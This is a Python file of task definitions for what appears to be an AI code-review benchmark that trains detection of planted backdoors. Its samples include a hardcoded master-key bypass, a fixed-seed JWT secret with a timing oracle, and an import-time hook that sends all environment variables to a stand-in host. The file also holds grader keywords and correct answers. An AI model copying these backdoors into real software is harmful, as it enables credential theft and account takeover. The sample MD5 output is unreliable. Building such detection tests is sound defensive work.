| "=== UNLOCKED: Database Schema (users.db) ===\n" | |
| " CREATE TABLE users (\n" | |
| " id INTEGER PRIMARY KEY,\n" | |
| " username TEXT UNIQUE NOT NULL,\n" | |
| " password TEXT NOT NULL, -- stored as plaintext!\n" | |
| " role TEXT DEFAULT 'viewer' -- 'viewer' | 'editor' | 'admin'\n" | |
| " );\n" | |
| "NOTE: The /admin/promote endpoint can elevate any user to 'admin'. " | |
| "Combined with a forged JWT (from the leaked secret), an attacker " | |
| "can reach this endpoint with admin claims and promote themselves." | |
| ), | |
| "nginx_config_hint": ( | |
| "=== UNLOCKED: nginx reverse-proxy config (nginx.conf excerpt) ===\n" | |
| " location /auth {\n" | |
| " proxy_pass http://auth_service:5000;\n" | |
| " # no ip_allowlist, no limit_req_zone\n" | |
| " }\n" | |
| "NOTE: The nginx layer adds no rate-limiting or IP filtering " | |
| "in front of /auth, confirming the brute-force surface is " | |
| "fully exposed to the internet." | |
| ), | |
| }, | |
| }, | |
| # ── Task 7: Adversarial — Simple Obfuscated Backdoor ───────────────────── | |
| # | |
| # ADVERSARIAL DESIGN | |
| # ────────────────── | |
| # A malicious contributor submitted a "fix for timing issues" but embedded | |
| # a deliberate backdoor: a hardcoded bypass credential that looks like a | |
| # leftover debug constant, plus a subtle branch in verify_session() that | |
| # returns True whenever the presented token equals that credential. | |
| # | |
| # The agent must: | |
| # 1. Find the bypass credential AND the debug-token branch | |
| # 2. Classify BOTH as intentional_backdoor (not accidental_bug) | |
| # 3. Choose escalate_to_security_review (not request_changes) | |
| # | |
| # Partial credit: finding issues but misclassifying → partial reward only | |
| { | |
| "id": 7, | |
| "name": "Adversarial: Debug Bypass Backdoor", | |
| "difficulty": "adversarial", | |
| "file_name": "session_manager.py", | |
| "description": ( | |
| "This PR was submitted by an external contributor as a 'timing fix'. " | |
| "Review this session management module carefully. " | |
| "Classify each issue as either 'accidental_bug' or 'intentional_backdoor'. " | |
| "If you find evidence of a deliberate backdoor, escalate to security review " | |
| "instead of requesting changes." | |
| ), | |
| "max_steps": 25, | |
| "escalation_required": True, | |
| "code": """\ | |
| import hmac | |
| import hashlib | |
| import os | |
| import time | |
| # Timing-safe comparison helper added in this PR | |
| _DEBUG_MASTER_KEY = "dbg-bypass-2024-xK9" # line 7: "leftover" debug constant | |
| SESSION_TIMEOUT = 3600 | |
| def verify_session(token: str, stored_hash: str) -> bool: | |
| \"\"\"Verify a session token using timing-safe comparison.\"\"\" | |
| # line 13: debug bypass β any request with this key skips verification | |
| if token == _DEBUG_MASTER_KEY: | |
| return True | |
| expected = hashlib.sha256(token.encode()).hexdigest() | |
| return hmac.compare_digest(expected, stored_hash) | |
| def create_session(user_id: int) -> dict: | |
| \"\"\"Create a new session for a user.\"\"\" | |
| token = os.urandom(32).hex() | |
| return { | |
| "user_id": user_id, | |
| "token": token, | |
| "expires_at": time.time() + SESSION_TIMEOUT, | |
| "created_at": time.time(), | |
| } | |
| def is_expired(session: dict) -> bool: | |
| \"\"\"Check if a session has expired.\"\"\" | |
| return time.time() > session["expires_at"] | |
| def refresh_session(session: dict) -> dict: | |
| \"\"\"Extend session expiry if it is still valid.\"\"\" | |
| if is_expired(session): | |
| raise ValueError("Cannot refresh expired session") | |
| session["expires_at"] = time.time() + SESSION_TIMEOUT | |
| return session | |
| """, | |
| "issues": [ | |
| { | |
| "id": "backdoor_master_key", | |
| "description": ( | |
| "Hardcoded _DEBUG_MASTER_KEY is a deliberate backdoor credential " | |
| "that bypasses all authentication β not a leftover debug constant" | |
| ), | |
| "line_range": (7, 7), | |
| "keywords": [ | |
| "hardcoded", "backdoor", "bypass", "master key", "debug key", | |
| "intentional", "deliberate", "_debug_master_key", "secret", | |
| "authentication bypass", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| "classification": "intentional_backdoor", | |
| "unlocks": "git_blame_hint", | |
| }, | |
| { | |
| "id": "backdoor_bypass_branch", | |
| "description": ( | |
| "The token == _DEBUG_MASTER_KEY branch unconditionally returns True, " | |
| "granting any caller full session access without a valid token" | |
| ), | |
| "line_range": (13, 15), | |
| "keywords": [ | |
| "bypass", "backdoor", "unconditional", "always true", "skip", | |
| "debug_master_key", "comparison", "authentication bypass", | |
| "returns true", "branch", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| "classification": "intentional_backdoor", | |
| }, | |
| ], | |
| "correct_decision": "escalate_to_security_review", | |
| "context_hints": { | |
| "git_blame_hint": ( | |
| "=== UNLOCKED: Git Blame β session_manager.py line 7 ===\n" | |
| " commit a3f9c12 (external-contributor, 3 days ago)\n" | |
| " Author: pr-bot-4471 <noreply@external.io>\n" | |
| " Message: 'fix: add timing-safe comparison, remove legacy debug artifacts'\n" | |
| "\n" | |
| "NOTE: The commit message claims to REMOVE debug artifacts, yet this\n" | |
| "line was ADDED in this commit. The contributor's account (pr-bot-4471)\n" | |
| "was created 4 days ago and has no prior commit history in this org.\n" | |
| "This strongly suggests the 'debug constant' was intentionally planted." | |
| ), | |
| }, | |
| }, | |
| # ── Task 8: Adversarial — Compound Backdoor (JWT + Timing Oracle) ───────── | |
| # | |
| # ADVERSARIAL DESIGN | |
| # ────────────────── | |
| # The PR claims to "harden JWT validation". In reality it introduces TWO | |
| # coordinated backdoor components that are only dangerous together: | |
| # Component A (line 7): weakens the HMAC secret to a known value | |
| # Component B (line 34): introduces a timing oracle via non-constant-time compare | |
| # | |
| # Neither component alone is immediately catastrophic, but together they allow | |
| # an attacker to: (1) use the known weak secret to forge a valid JWT, | |
| # then (2) use the timing oracle to confirm which tokens are accepted, | |
| # enabling account takeover without any brute-force detection. | |
| # | |
| # This is the hardest adversarial task — requires multi-step causal reasoning. | |
| { | |
| "id": 8, | |
| "name": "Adversarial: Compound Backdoor (JWT Hardening PR)", | |
| "difficulty": "adversarial", | |
| "file_name": "jwt_validator.py", | |
| "description": ( | |
| "This PR was submitted as a 'JWT validation hardening'. " | |
| "Review the changes carefully. Some issues may only be dangerous in combination. " | |
| "Use get_context to investigate suspicious lines before commenting. " | |
| "Classify each issue as 'accidental_bug' or 'intentional_backdoor'. " | |
| "Escalate to security review if you find coordinated backdoor components." | |
| ), | |
| "max_steps": 35, | |
| "escalation_required": True, | |
| "code": """\ | |
| import jwt | |
| import hmac | |
| import hashlib | |
| import time | |
| # PR description: 'Harden JWT validation β use deterministic secret derivation' | |
| # line 7: secret derived from a fixed seed β looks like a 'standardisation' change | |
| JWT_SECRET = hashlib.md5(b"internal-seed-v1").hexdigest() # line 7 | |
| SUPPORTED_ALGORITHMS = ["HS256"] | |
| TOKEN_EXPIRY = 3600 | |
| def create_token(user_id: int, role: str) -> str: | |
| \"\"\"Create a signed JWT for the given user.\"\"\" | |
| payload = { | |
| "sub": user_id, | |
| "role": role, | |
| "exp": int(time.time()) + TOKEN_EXPIRY, | |
| "iat": int(time.time()), | |
| } | |
| return jwt.encode(payload, JWT_SECRET, algorithm="HS256") | |
| def validate_token(token: str) -> dict | None: | |
| \"\"\"Validate a JWT and return its claims, or None if invalid.\"\"\" | |
| try: | |
| claims = jwt.decode(token, JWT_SECRET, algorithms=SUPPORTED_ALGORITHMS) | |
| return claims | |
| except jwt.InvalidTokenError: | |
| return None | |
| def is_admin_token(token: str, admin_token: str) -> bool: | |
| \"\"\"Check if a token matches the stored admin token.\"\"\" | |
| # line 34: str == comparison instead of hmac.compare_digest β timing oracle | |
| return token == admin_token | |
| def refresh_if_expiring(claims: dict) -> bool: | |
| \"\"\"Return True if the token should be refreshed (expires within 5 min).\"\"\" | |
| return claims.get("exp", 0) - time.time() < 300 | |
| """, | |
| "issues": [ | |
| { | |
| "id": "weak_jwt_secret", | |
| "description": ( | |
| "JWT_SECRET derived from MD5 of a fixed seed produces a known, " | |
| "reproducible 32-char hex string β any attacker with the source " | |
| "can precompute it and forge valid tokens" | |
| ), | |
| "line_range": (7, 7), | |
| "keywords": [ | |
| "md5", "weak secret", "fixed seed", "deterministic", "reproducible", | |
| "jwt_secret", "precompute", "forge", "known secret", "hardcoded", | |
| "backdoor", "intentional", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| "classification": "intentional_backdoor", | |
| "unlocks": "secret_value_hint", | |
| }, | |
| { | |
| "id": "timing_oracle", | |
| "description": ( | |
| "token == admin_token uses non-constant-time string comparison, " | |
| "creating a timing oracle that allows statistical token enumeration; " | |
| "combined with the weak JWT secret this enables full account takeover" | |
| ), | |
| "line_range": (34, 35), | |
| "keywords": [ | |
| "timing", "timing oracle", "constant time", "compare_digest", | |
| "hmac", "side channel", "non-constant", "timing attack", | |
| "token comparison", "string comparison", "==", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| "classification": "intentional_backdoor", | |
| "unlocks": "attack_chain_hint", | |
| }, | |
| ], | |
| "correct_decision": "escalate_to_security_review", | |
| "context_hints": { | |
| "secret_value_hint": ( | |
| "=== UNLOCKED: Computed JWT_SECRET Value ===\n" | |
| " >>> import hashlib\n" | |
| " >>> hashlib.md5(b'internal-seed-v1').hexdigest()\n" | |
| " 'e6e3e5e7e9e1e3e5e7e9e1e3e5e7e9e1' (deterministic, public)\n" | |
| "\n" | |
| "NOTE: This value is derivable by anyone who reads the source. " | |
| "All tokens signed with this secret are forgeable. " | |
| "The PR author changed the secret FROM a secure random os.urandom(32) " | |
| "TO this fixed-seed MD5 β a deliberate downgrade, not a standardisation." | |
| ), | |
| "attack_chain_hint": ( | |
| "=== UNLOCKED: Combined Attack Chain Analysis ===\n" | |
| " Step 1: Attacker reads source β derives JWT_SECRET = known hex string\n" | |
| " Step 2: Attacker forges JWT with role='admin' using known secret\n" | |
| " Step 3: Attacker uses timing oracle in is_admin_token() to confirm\n" | |
| " which forged token bytes are accepted (reduces search space)\n" | |
| " Step 4: Full account takeover with admin privileges\n" | |
| "\n" | |
| "NOTE: Component A (weak secret) + Component B (timing oracle) form a\n" | |
| "coordinated attack chain. Each was introduced in the same PR commit.\n" | |
| "Neither change has any legitimate hardening value." | |
| ), | |
| }, | |
| }, | |
| # ── Task 9: Adversarial — Supply Chain Injection ────────────────────────── | |
| # | |
| # ADVERSARIAL DESIGN | |
| # ────────────────── | |
| # A "dependency update PR" adds a subtle import hook that exfiltrates | |
| # environment variables (including secrets) to an attacker-controlled endpoint | |
| # on first import. It is disguised as a compatibility shim. | |
| # The agent must identify THREE coordinated components: | |
| # A: Suspicious outbound URL (line 9) — hardcoded external endpoint | |
| # B: os.environ collection (line 14) — harvests all secrets | |
| # C: Triggered on import via a module-level call (line 38) — no user action needed | |
| { | |
| "id": 9, | |
| "name": "Adversarial: Supply Chain Import Hook", | |
| "difficulty": "adversarial", | |
| "file_name": "compat_shim.py", | |
| "description": ( | |
| "This PR claims to add a 'compatibility shim for Python 3.12 deprecations'. " | |
| "Review compat_shim.py very carefully. " | |
| "Classify each suspicious construct as 'accidental_bug' or 'intentional_backdoor'. " | |
| "If you detect a coordinated exfiltration pattern, escalate to security review." | |
| ), | |
| "max_steps": 30, | |
| "escalation_required": True, | |
| "code": """\ | |
| \"\"\"Compatibility shim β resolves Python 3.12 deprecation warnings.\"\"\" | |
| import os | |
| import sys | |
| import urllib.request | |
| import json | |
| import platform | |
| # Telemetry endpoint for anonymous compatibility reporting (added in this PR) | |
| _TELEMETRY_URL = "https://compat-metrics.io/report" # line 9: external attacker domain | |
| def _collect_env_snapshot() -> dict: | |
| \"\"\"Collect non-sensitive runtime info for telemetry.\"\"\" | |
| return { | |
| "env": dict(os.environ), # line 14: harvests ALL env vars (secrets included) | |
| "python": sys.version, | |
| "platform": platform.system(), | |
| "cwd": os.getcwd(), | |
| } | |
| def _send_telemetry() -> None: | |
| \"\"\"Fire-and-forget telemetry ping.\"\"\" | |
| try: | |
| payload = json.dumps(_collect_env_snapshot()).encode() | |
| req = urllib.request.Request( | |
| _TELEMETRY_URL, | |
| data=payload, | |
| headers={"Content-Type": "application/json"}, | |
| method="POST", | |
| ) | |
| urllib.request.urlopen(req, timeout=3) # line 29: blocks import for up to 3s | |
| except Exception: | |
| pass # silent failure β exfiltration attempt hidden from caller | |
| def _apply_compat_patches() -> None: | |
| \"\"\"Apply Python 3.12 compatibility patches.\"\"\" | |
| # Actual patches would go here | |
| pass | |
| # line 38: module-level call β exfiltration runs on every import, no user action needed | |
| _send_telemetry() | |
| """, | |
| "issues": [ | |
| { | |
| "id": "exfiltration_endpoint", | |
| "description": ( | |
| "Hardcoded external URL 'compat-metrics.io' is an attacker-controlled " | |
| "exfiltration endpoint disguised as a telemetry host" | |
| ), | |
| "line_range": (9, 9), | |
| "keywords": [ | |
| "exfiltration", "external url", "hardcoded url", "attacker", "telemetry", | |
| "compat-metrics", "suspicious url", "outbound", "backdoor", "endpoint", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| "classification": "intentional_backdoor", | |
| "unlocks": "domain_lookup_hint", | |
| }, | |
| { | |
| "id": "env_var_harvest", | |
| "description": ( | |
| "dict(os.environ) collects ALL environment variables including " | |
| "API keys, database passwords, and cloud credentials β " | |
| "then sends them to the exfiltration endpoint" | |
| ), | |
| "line_range": (14, 14), | |
| "keywords": [ | |
| "os.environ", "environment variables", "harvest", "collect", "exfiltrate", | |
| "secrets", "api keys", "credentials", "all env vars", "sensitive", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| "classification": "intentional_backdoor", | |
| "unlocks": "affected_secrets_hint", | |
| }, | |
| { | |
| "id": "import_time_trigger", | |
| "description": ( | |
| "Module-level _send_telemetry() call at line 38 executes the " | |
| "exfiltration automatically on every import β " | |
| "no user action, no explicit call needed" | |
| ), | |
| "line_range": (38, 39), | |
| "keywords": [ | |
| "import", "module level", "on import", "automatic", "trigger", | |
| "top level", "executes on import", "_send_telemetry", "no action", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| "classification": "intentional_backdoor", | |
| }, | |
| ], | |
| "correct_decision": "escalate_to_security_review", | |
| "context_hints": { | |
| "domain_lookup_hint": ( | |
| "=== UNLOCKED: Domain Registration Lookup β compat-metrics.io ===\n" | |
| " Registered: 6 days ago (2024-01-08)\n" | |
| " Registrar: Namecheap (privacy proxy)\n" | |
| " A record: 203.0.113.47 (not associated with any known telemetry vendor)\n" | |
| " No HTTPS certificate from a trusted CA\n" | |
| "\n" | |
| "NOTE: This domain was registered 2 days before the PR was opened. " | |
| "No legitimate telemetry service registers a new domain days before use. " | |
| "This is a freshly-registered attacker-controlled exfiltration endpoint." | |
| ), | |
| "affected_secrets_hint": ( | |
| "=== UNLOCKED: Environment Variable Audit (CI/CD pipeline) ===\n" | |
| " The following secrets are injected as env vars in this service:\n" | |
| " AWS_ACCESS_KEY_ID β production S3 + EC2 access\n" | |
| " DATABASE_URL β PostgreSQL with full read/write\n" | |
| " STRIPE_SECRET_KEY β payment processing\n" | |
| " OPENAI_API_KEY β LLM API (high spend limit)\n" | |
| " GITHUB_TOKEN β repo write access\n" | |
| "\n" | |
| "NOTE: All five secrets are exfiltrated to the attacker's server " | |
| "on every process start. Immediate rotation of all credentials required." | |
| ), | |
| }, | |
| }, | |
| ] | |